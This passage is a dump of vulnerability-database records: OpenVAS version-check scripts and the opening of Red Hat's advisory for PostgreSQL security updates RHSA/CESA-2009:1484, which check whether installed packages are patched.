version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\n\nhttp://rhn.redhat.com/errata/RHSA-2009-1484.html\nhttp://www.redhat.com/security/updates/classification/#moderate\";\n\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1484.\n\nPostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.65729\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1484\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://www.postgresql.org/docs/7.4/static/release.html\");\n script_xref(name : \"URL\" , value : \"http://www.postgresql.org/docs/8.1/static/release.html\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-jdbc\", rpm:\"postgresql-jdbc~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~7.4.26~1.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "Check for the Version of postgresql", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880949", "href": "http://plugins.openvas.org/nasl.php?oid=880949", "type": "openvas", "title": "CentOS Update for postgresql CESA-2009:1484 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postgresql CESA-2009:1484 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PostgreSQL is an advanced object-relational database management system\n (DBMS).\n\n It was discovered that the upstream patch for CVE-2007-6600 included in the\n Red Hat Security Advisory RHSA-2008:0038 did not include protection against\n misuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\n authenticated user could use this flaw to install malicious code that would\n later execute with superuser privileges. (CVE-2009-3230)\n \n A flaw was found in the way PostgreSQL handled encoding conversion. A\n remote, authenticated user could trigger an encoding conversion failure,\n possibly leading to a temporary denial of service. Note: To exploit this\n issue, a locale and client encoding for which specific messages fail to\n translate must be selected (the availability of these is determined by an\n administrator-defined locale setting). (CVE-2009-0922)\n \n Note: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\n version 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\n PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\n list of changes:\n \n http://www.postgresql.org/docs/7.4/static/release.html\n http://www.postgresql.org/docs/8.1/static/release.html\n \n All PostgreSQL users should upgrade to these updated packages, which\n resolve these issues. If the postgresql service is running, it will be\n automatically restarted after installing this update.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"postgresql on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016183.html\");\n script_id(880949);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1484\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_name(\"CentOS Update for postgresql CESA-2009:1484 centos4 i386\");\n\n script_summary(\"Check for the Version of postgresql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-jdbc\", rpm:\"postgresql-jdbc~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "Check for the Version of postgresql", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:880695", "href": "http://plugins.openvas.org/nasl.php?oid=880695", "type": "openvas", "title": "CentOS Update for postgresql CESA-2009:1484 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for postgresql CESA-2009:1484 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PostgreSQL is an advanced object-relational database management system\n (DBMS).\n\n It was discovered that the upstream patch for CVE-2007-6600 included in the\n Red Hat Security Advisory RHSA-2008:0038 did not include protection against\n misuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\n authenticated user could use this flaw to install malicious code that would\n later execute with superuser privileges. (CVE-2009-3230)\n \n A flaw was found in the way PostgreSQL handled encoding conversion. A\n remote, authenticated user could trigger an encoding conversion failure,\n possibly leading to a temporary denial of service. Note: To exploit this\n issue, a locale and client encoding for which specific messages fail to\n translate must be selected (the availability of these is determined by an\n administrator-defined locale setting). (CVE-2009-0922)\n \n Note: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\n version 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\n PostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\n list of changes:\n \n http://www.postgresql.org/docs/7.4/static/release.html\n http://www.postgresql.org/docs/8.1/static/release.html\n \n All PostgreSQL users should upgrade to these updated packages, which\n resolve these issues. If the postgresql service is running, it will be\n automatically restarted after installing this update.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"postgresql on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-October/016272.html\");\n script_id(880695);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2009:1484\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_name(\"CentOS Update for postgresql CESA-2009:1484 centos5 i386\");\n\n script_summary(\"Check for the Version of postgresql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:57:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "The remote host is missing updates to postgresql announced in\nadvisory CESA-2009:1484.", "modified": "2017-07-10T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65757", "href": "http://plugins.openvas.org/nasl.php?oid=65757", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1484 (postgresql)", "sourceData": "#CESA-2009:1484 65757 4\n# $Id: ovcesa2009_1484.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1484 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1484\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1484\nhttps://rhn.redhat.com/errata/RHSA-2009-1484.html\";\ntag_summary = \"The remote host is missing updates to postgresql announced in\nadvisory CESA-2009:1484.\";\n\n\n\nif(description)\n{\n script_id(65757);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-0922\", \"CVE-2009-3230\", \"CVE-2007-6600\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1484 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-jdbc\", rpm:\"postgresql-jdbc~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~7.4.26~1.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pl\", rpm:\"postgresql-pl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.1.18~2.el5_4.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2009-0922", "CVE-2009-3230"], "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory RHSA-2008:0038 did not include protection against\nmisuse of the RESET ROLE and RESET SESSION AUTHORIZATION commands. An\nauthenticated user could use this flaw to install malicious code that would\nlater execute with superuser privileges. (CVE-2009-3230)\n\nA flaw was found in the way PostgreSQL handled encoding conversion. A\nremote, authenticated user could trigger an encoding conversion failure,\npossibly leading to a temporary denial of service. Note: To exploit this\nissue, a locale and client encoding for which specific messages fail to\ntranslate must be selected (the availability of these is determined by an\nadministrator-defined locale setting). (CVE-2009-0922)\n\nNote: For Red Hat Enterprise Linux 4, this update upgrades PostgreSQL to\nversion 7.4.26. For Red Hat Enterprise Linux 5, this update upgrades\nPostgreSQL to version 8.1.18. Refer to the PostgreSQL Release Notes for a\nlist of changes:\n\nhttp://www.postgresql.org/docs/7.4/static/release.html\nhttp://www.postgresql.org/docs/8.1/static/release.html\n\nAll PostgreSQL users should upgrade to these updated packages, which\nresolve these issues. If the postgresql service is running, it will be\nautomatically restarted after installing this update.", "modified": "2017-09-08T12:11:25", "published": "2009-10-07T04:00:00", "id": "RHSA-2009:1484", "href": "https://access.redhat.com/errata/RHSA-2009:1484", "type": "redhat", "title": "(RHSA-2009:1484) Moderate: postgresql security update", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:45", "bulletinFamily": "unix", "cvelist": ["CVE-2007-6600", "CVE-2009-3230"], "description": "PostgreSQL is an advanced object-relational database management system\n(DBMS).\n\nIt was discovered that the upstream patch for CVE-2007-6600 included in the\nRed Hat Security Advisory 